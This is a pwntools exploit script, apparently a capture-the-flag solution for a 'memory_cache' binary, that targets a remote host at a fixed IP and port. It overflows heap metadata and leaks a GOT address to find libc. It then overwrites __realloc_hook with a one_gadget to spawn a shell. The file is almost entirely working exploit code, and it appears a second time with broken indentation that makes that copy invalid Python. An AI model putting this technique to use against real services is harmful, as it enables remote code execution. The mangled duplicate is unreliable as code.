bongtrop/exploit_mc.py

## exploit_mc.py

from pwn import *
import time

REMOTE = False
DEBUG = False

if REMOTE:
    p = remote("103.55.141.111", 2954)
else:
    p = process("./memory_cache")
    if DEBUG:
        proc.wait_for_debugger(p.pid)

def set_cache(name, size, value, wait=True):
    p.sendline("SET "+name)
    time.sleep(0.1)
    p.sendline(str(size))
    time.sleep(0.1)
    p.sendline(value)
    time.sleep(0.1)
    if wait:
        p.readuntil("OK")

def get_cache(name):
    p.sendline("GET "+name)
    front = p.readuntil(", ")
    last = p.readline()
    return last

# Wait for init
time.sleep(1)
print p.readline()

# align heap
set_cache("a", 24, "a"*24)
set_cache("b", 56, "b"*56)
set_cache("a", 56, "a"*56)
set_cache("c", 56, "c"*56)

# overflow chunk `a` size
set_cache("b", 57, "b"*56 + "\xff")

# overwrite c->data pointer to got for get got table value
set_cache("a", 112, "a"*56 + p64(0x41) + p64(0xcfc6e51e26fd662b) + p64(0x00b6ba66a47fdec8) + p64(0x00000000694ffebc) + p64(8) + p64(0x0000000000602048))

leak = get_cache("c")

# leak got and search for libc version
"""
leak_libc = []
for i in range(0, 64, 8):
    print hex(u64(leak[i:i+8]))

read                0x7f95c0b91220
__libc_start_main   0x7f95c0aba740
SHA1_Init           0x7f95c0ecebc0
free                0x7f95c0b1e4f0
strlen              0x7f95c0b25720
atoi                0x7f95c0ad0e80
SHA1_Final          0x7f95c0ecea20
strchr              0x7f95c0b23ab0
"""
if REMOTE:
    # libc version libc6_2.23-0ubuntu10_amd64
    atoi_offset = 0x036e80
    _realloc_hook_offset = 0x3c4b08
    one_gadget_offset = 0xf1147

else:
    # libc version libc6_2.27-3ubuntu1_amd64
    atoi_offset = 0x40680
    _realloc_hook_offset = 0x3ebc28
    one_gadget_offset = 0x10a38c

print "atoi addr: " + hex(u64(leak[:8]))
libc_base = u64(leak[:8]) - atoi_offset
print "base libc: " + hex(libc_base)

_realloc_hook_addr = libc_base + _realloc_hook_offset
print "__realloc_hook addr: " + hex(_realloc_hook_addr)
one_gadget_addr = libc_base + one_gadget_offset
print "one gadget addr: " + hex(one_gadget_addr)

# overwrite _realloc_hook to one gadget
set_cache("a", 112, "a"*56 + p64(0x41) + p64(0xcfc6e51e26fd662b) + p64(0x00b6ba66a47fdec8) + p64(0x00000000694ffebc) + p64(96) + p64(_realloc_hook_addr - 8 - 8 + 5))

leak = get_cache("c")
set_cache("c", 19, leak[:11] + p64(one_gadget_addr))

# trig realloc and get shell
set_cache("d", 1, "", False)
p.interactive()

	from pwn import *
	import time

	REMOTE = False
	DEBUG = False

	if REMOTE:
	p = remote("103.55.141.111", 2954)
	else:
	p = process("./memory_cache")
	if DEBUG:
	proc.wait_for_debugger(p.pid)

	def set_cache(name, size, value, wait=True):
	p.sendline("SET "+name)
	time.sleep(0.1)
	p.sendline(str(size))
	time.sleep(0.1)
	p.sendline(value)
	time.sleep(0.1)
	if wait:
	p.readuntil("OK")

	def get_cache(name):
	p.sendline("GET "+name)
	front = p.readuntil(", ")
	last = p.readline()
	return last

	# Wait for init
	time.sleep(1)
	print p.readline()

	# align heap
	set_cache("a", 24, "a"*24)
	set_cache("b", 56, "b"*56)
	set_cache("a", 56, "a"*56)
	set_cache("c", 56, "c"*56)

	# overflow chunk `a` size
	set_cache("b", 57, "b"*56 + "\xff")

	# overwrite c->data pointer to got for get got table value
	set_cache("a", 112, "a"*56 + p64(0x41) + p64(0xcfc6e51e26fd662b) + p64(0x00b6ba66a47fdec8) + p64(0x00000000694ffebc) + p64(8) + p64(0x0000000000602048))

	leak = get_cache("c")

	# leak got and search for libc version
	"""
	leak_libc = []
	for i in range(0, 64, 8):
	print hex(u64(leak[i:i+8]))

	read 0x7f95c0b91220
	__libc_start_main 0x7f95c0aba740
	SHA1_Init 0x7f95c0ecebc0
	free 0x7f95c0b1e4f0
	strlen 0x7f95c0b25720
	atoi 0x7f95c0ad0e80
	SHA1_Final 0x7f95c0ecea20
	strchr 0x7f95c0b23ab0
	"""
	if REMOTE:
	# libc version libc6_2.23-0ubuntu10_amd64
	atoi_offset = 0x036e80
	_realloc_hook_offset = 0x3c4b08
	one_gadget_offset = 0xf1147

	else:
	# libc version libc6_2.27-3ubuntu1_amd64
	atoi_offset = 0x40680
	_realloc_hook_offset = 0x3ebc28
	one_gadget_offset = 0x10a38c

	print "atoi addr: " + hex(u64(leak[:8]))
	libc_base = u64(leak[:8]) - atoi_offset
	print "base libc: " + hex(libc_base)

	_realloc_hook_addr = libc_base + _realloc_hook_offset
	print "__realloc_hook addr: " + hex(_realloc_hook_addr)
	one_gadget_addr = libc_base + one_gadget_offset
	print "one gadget addr: " + hex(one_gadget_addr)

	# overwrite _realloc_hook to one gadget
	set_cache("a", 112, "a"*56 + p64(0x41) + p64(0xcfc6e51e26fd662b) + p64(0x00b6ba66a47fdec8) + p64(0x00000000694ffebc) + p64(96) + p64(_realloc_hook_addr - 8 - 8 + 5))

	leak = get_cache("c")
	set_cache("c", 19, leak[:11] + p64(one_gadget_addr))

	# trig realloc and get shell
	set_cache("d", 1, "", False)
	p.interactive()